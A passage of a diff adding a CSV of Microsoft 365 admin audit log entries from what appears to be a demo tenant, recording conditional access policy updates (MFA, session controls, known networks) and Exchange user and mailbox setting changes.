+    ""Value"": ""{\""Version\"":0,\""CreatedDateTime\"":\""2020-05-19T13:34:15.2394934Z\"",\""ModifiedDateTime\"":\""2020-05-19T13:39:04.7333386Z\"",\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""None\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""Guests\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\"",\""RequireCompliantDevice\""]}]}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/22/2020 2:13:22 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Yanivsh -CA Test""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-22T02:13:21Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/22/2020 2:13:21 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-22T02:13:21Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/22/2020 2:13:21 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-22T02:13:22Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/22/2020 2:13:22 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-22T02:13:21Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/22/2020 2:13:21 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-22T02:13:21Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/22/2020 2:13:21 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-22T02:13:21Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/22/2020 2:13:21 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-22T02:13:21Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/22/2020 2:13:21 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-22T02:13:22Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/22/2020 2:13:22 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-22T02:13:22Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/22/2020 2:13:21 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-22T02:13:21Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/22/2020 2:13:21 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-22T02:13:22Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/22/2020 2:13:22 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-05-22T02:13:21Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/22/2020 2:13:21 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""5/19/2020 1:39:05 PM""
+  }
+]"
+2020-05-22T02:13:21Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/22/2020 2:13:21 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-21T17:27:42Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\f7ed24a4-8fab-4f94-a97f-533604a3453a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-21T19:02:18Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-21T19:02:18Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-21T18:18:58Z,SpoolsProvisioning-ApplicationAccount@namprd06.prod.outlook.com,52.225.129.38:43510,Set-Mailbox,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""TkFNUFIwNkEwMDcuUFJPRC5PVVRMT09LLkNPTS9NaWNyb3NvZnQgRXhjaGFuZ2UgSG9zdGVkIE9yZ2FuaXphdGlvbnMvc2VjY3hwbmluamEub25taWNyb3NvZnQuY29tL01vclNoYWJp0""
+  },
+  {
+    ""Name"": ""ResourceEmailAddresses"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""BypassLiveId"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": ""SN6PR06A07DC002.NAMPR06A007.PROD.OUTLOOK.COM""
+  },
+  {
+    ""Name"": ""EmailAddresses"",
+    ""Value"": ""SIP:MorShabi@seccxpninja.onmicrosoft.com;SMTP:MorShabi@seccxpninja.onmicrosoft.com;SPO:SPO_bbe90a21-3041-4025-8291-5a36b068cdc5@SPO_4b2462a4-bbee-495a-a0e1-f23ae524cc9c""
+  }
+]"
+2020-05-21T18:28:44Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-21T10:59:58Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-21T10:59:57Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-21T12:27:50Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-21T13:00:51Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-21T13:00:52Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-21T11:22:50Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\f7ed24a4-8fab-4f94-a97f-533604a3453a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-21T23:30:37Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\f7ed24a4-8fab-4f94-a97f-533604a3453a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-21T22:52:47Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-21T22:52:47Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-04-27T03:17:17Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/27/2020 3:17:17 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-27T03:17:17Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/27/2020 3:17:16 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-27T03:17:16Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/27/2020 3:17:16 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-27T03:17:16Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/27/2020 3:17:16 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-27T03:17:16Z,,,Set-ConditionalAccessPolicy,"[
